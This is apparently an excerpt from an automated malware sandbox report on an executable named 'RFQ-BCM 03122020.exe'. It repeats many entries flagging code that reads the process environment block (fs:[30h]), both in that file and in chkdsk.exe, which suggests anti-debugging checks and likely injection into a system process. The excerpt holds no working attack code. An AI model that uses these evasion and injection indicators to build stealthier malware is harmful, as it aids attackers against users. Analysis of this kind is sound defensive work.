          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C4740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9B477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C28DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B72D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C32D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B8D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C405AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C23D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B7AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BFA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B83D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B97D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C48D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BB3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C3E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C2FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C48ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C0FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BB8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B7E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C31608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B8766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C2FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B88794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BB37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B74F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C48F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C4070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C0FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B8FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B8EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04B9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04BBBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04BA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04BBA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C06DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04BB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04BB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04BB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04BB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04BBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04BBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04C38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04B82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 13_2_04BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04BB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04C33D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 13_2_04B93D34 mov eax, dword ptr fs:[00000030h]
